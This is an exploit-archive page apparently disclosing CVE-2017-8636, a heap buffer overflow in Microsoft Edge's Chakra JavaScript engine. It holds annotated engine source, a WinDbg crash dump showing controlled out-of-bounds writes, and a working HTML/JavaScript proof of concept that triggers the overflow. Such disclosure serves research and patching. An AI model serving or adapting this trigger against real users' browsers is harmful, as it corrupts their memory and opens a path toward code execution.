what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Edge Chakra Heap Buffer Overflow

Microsoft Edge Chakra Heap Buffer Overflow
Posted Aug 20, 2017
Authored by He Xiaoxiao, Huang Anwen

Microsoft Edge Chakra suffers from a heap buffer overflow vulnerability.

tags | exploit, overflow
advisories | CVE-2017-8636
SHA-256 | c87c5886e5b3749a1661ee361d2c847e905a9fb0f020a8c4d4f8316cf59c7d64
Download | Favorite | View

Microsoft Edge Chakra Heap Buffer Overflow

Change Mirror Download
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
 
This is the HEAP BASED OVERFLOW version of the issue.
 
    // ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
    Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
    {
 
        [...]
 
        if (!isAsmJs && executeFunction->IsCoroutine())
        {
            [...]
        }
        else
        {
            InterpreterStackFrame::Setup setup(function, args);
            size_t varAllocCount = setup.GetAllocationVarCount();
            //printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
            size_t varSizeInBytes = varAllocCount * sizeof(Var);
 
            //
            // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
            //
            DWORD_PTR stackAddr;
 
            // If the locals area exceeds a certain limit, allocate it from a private arena rather than
            // this frame. The current limit is based on an old assert on the number of locals we would allow here.
            if (varAllocCount > InterpreterStackFrame::LocalsThreshold)                  //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
            {
                ArenaAllocator *tmpAlloc = nullptr;
                fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
                allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
                stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
            }
            else
            {
                PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
                allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
                memset(allocation, 0xFE, varSizeInBytes);
#endif
                stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
            }
 
        [...]
        return aReturn;
    }
     
     
     
     
 
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
 
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 00007ff7`49700000 00007ff7`49725000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffa`13700000 00007ffa`138db000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffa`119f0000 00007ffa`11a9e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffa`0e140000 00007ffa`0e1be000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffa`11b80000 00007ffa`11e79000   C:\Windows\System32\combase.dll
ModLoad: 00007ffa`103f0000 00007ffa`104e6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffa`11160000 00007ffa`11285000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffa`104f0000 00007ffa`1055a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffa`11630000 00007ffa`116cd000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffa`0a400000 00007ffa`0a460000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffa`10c90000 00007ffa`10d50000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ff9`f3680000 00007ff9`f3a44000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffa`10560000 00007ffa`10c52000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffa`11940000 00007ffa`119e1000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffa`11b20000 00007ffa`11b79000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffa`113e0000 00007ffa`11431000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffa`10c60000 00007ffa`10c87000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffa`10200000 00007ffa`10388000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffa`10d60000 00007ffa`10eaa000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffa`11790000 00007ffa`1183a000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffa`08380000 00007ffa`08606000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffa`115b0000 00007ffa`1161c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffa`10d50000 00007ffa`10d58000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffa`11730000 00007ffa`1175d000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffa`054d0000 00007ffa`054f2000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffa`045d0000 00007ffa`045eb000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffa`11290000 00007ffa`113d5000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffa`0e370000 00007ffa`0e405000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ff9`f1650000 00007ff9`f2d01000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ff9`f0e60000 00007ff9`f164b000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffa`04630000 00007ffa`0466f000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffa`04d30000 00007ffa`04dfb000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffa`09f90000 00007ffa`0a096000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffa`0b640000 00007ffa`0b912000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffa`0da10000 00007ffa`0daf3000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffa`0abe0000 00007ffa`0b111000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffa`11e80000 00007ffa`132b7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffa`101b0000 00007ffa`101f9000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffa`11440000 00007ffa`115a6000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ff9`fddf0000 00007ff9`fde00000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffa`00260000 00007ffa`0027b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffa`07430000 00007ffa`07507000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffa`0f420000 00007ffa`0f47c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffa`0a730000 00007ffa`0a73b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffa`07260000 00007ffa`07428000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ff9`fe760000 00007ff9`fe77a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ff9`fd750000 00007ff9`fd768000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ff9`fb720000 00007ff9`fb767000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffa`0d180000 00007ffa`0d45f000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffa`0db30000 00007ffa`0dc52000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffa`060c0000 00007ffa`060e8000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ff9`f8480000 00007ff9`f84fa000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ff9`ff120000 00007ff9`ff17d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffa`0d460000 00007ffa`0da04000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffa`06cf0000 00007ffa`06faf000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ff9`f8060000 00007ff9`f80ba000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffa`06950000 00007ffa`0695f000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffa`06480000 00007ffa`06490000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffa`06ab0000 00007ffa`06b38000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ff9`fe370000 00007ff9`fe411000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffa`06760000 00007ffa`06774000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffa`05a10000 00007ffa`05a48000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffa`06b40000 00007ffa`06cc8000   C:\Windows\SYSTEM32\windows.globalization.dll
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> r
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
 r8=0000015e3d500030  r9=0000015e2c538000 r10=000000388f1fb918
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
r14=0000000000000000 r15=0000015e4063f9b3
iopl=0         nv up ei pl nz ac pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010210
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> dq ecx
0000015e`3d5401b0  00000000`00000000 00010000`42424242
0000015e`3d5401c0  00010000`42424242 00010000`42424242
0000015e`3d5401d0  00010000`42424242 00010000`42424242
0000015e`3d5401e0  00010000`42424242 00010000`42424242
0000015e`3d5401f0  00010000`42424242 00010000`42424242
0000015e`3d540200  00010000`42424242 00010000`42424242
0000015e`3d540210  00010000`42424242 00010000`42424242
0000015e`3d540220  00010000`42424242 00010000`42424242
 
0:016> dq [ecx+edx*8]
0000015e`3d550000  ????????`???????? ????????`????????
0000015e`3d550010  ????????`???????? ????????`????????
0000015e`3d550020  ????????`???????? ????????`????????
0000015e`3d550030  ????????`???????? ????????`????????
0000015e`3d550040  ????????`???????? ????????`????????
0000015e`3d550050  ????????`???????? ????????`????????
0000015e`3d550060  ????????`???????? ????????`????????
0000015e`3d550070  ????????`???????? ????????`????????
0:016> !address ecx
 
                                      
Failed to map Heaps (error 8007001e)
Usage:                  <unclassified>
Allocation Base:        0000015e`3d500000
Base Address:           0000015e`3d500000
End Address:            0000015e`3d550000
Region Size:            00000000`00050000
Type:                   00020000    MEM_PRIVATE
State:                  00001000    MEM_COMMIT
Protect:                00000004    PAGE_READWRITE
 
0:016> !address 0000015e`3d550000
Usage:                  Free
Base Address:           0000015e`3d550000
End Address:            0000015e`3d7f0000
Region Size:            00000000`002a0000
Type:                   00000000    
State:                  00010000    MEM_FREE
Protect:                00000001    PAGE_NOACCESS
 
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
     
-->
<html>
<head>
<title> POC </title>
</head>
<script>
 
var a=[]; 
a.length=0xffff-1; 
a.fill('0x42424242');
  
var s='{'; 
for(var i=0; i<0x8000-1; i++){
 s+= 'a'+i+':0,'
}; 
s+= 'b:0';
s+= '}';
  
var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')'; 
eval(c);
 
</script>
</html>

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close